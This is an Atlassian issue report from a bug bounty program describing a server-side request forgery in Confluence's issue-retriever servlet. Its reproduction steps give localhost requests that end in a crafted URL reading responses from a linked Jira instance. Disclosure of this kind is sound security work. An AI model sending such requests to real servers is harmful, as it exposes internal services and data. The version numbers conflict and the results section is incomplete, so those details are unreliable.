SSRF - /plugins/servlet/issue-retriever?columns=&url=XXX

Type atlassian
Modified 2019-06-26T01:17:29


h3. Issue Summary

The following issue was submitted to our bug bounty program.

This endpoint will allow attackers to read the full response of the provided URL. h3. Environment * Confluence 6.15.5

h3. Steps to Reproduce # Setup two Atlassian applications and create an Applink between them. In my case: {noformat} http://localhost:8154: Confluence 8.15.4 http://localhost:8820: Jira Software 8.2.0 {noformat}

# Get the Applink Id of Jira Software in Confluence by navigating to: {noformat} http://localhost:8154/rest/jiraanywhere/1.0/confluence-view-in-jira/jira-applink-id?jiraUrl=http://localhost:8820 {noformat} (in my case, it was 24830af1-59ec-3dff-ac70-12e66ebdd6c2)

# Navigate to {noformat} http://localhost:8154/plugins/servlet/applinks/oauth/login-dance/authorize?applicationLinkID=24830af1-59ec-3dff-ac70-12e66ebdd6c2 {noformat} to complete the applications linking. Make sure to use your own applink Id

# As an admin of Confluence, nagivate to the following URL: {noformat} http://localhost:8154/plugins/servlet/issue-retriever?columns=&url=http://localhost:8820/plugins/servlet/applinks/auth/conf/oauth/outbound/apl-2lo/11111111-2222-3333-4444-555555555555%3fcallback%3dhttps%3a// {noformat}

h3. Expected Results

A response is not received from h3. Actual Results

The response from is found in issue-retreiver.xml h3. Workaround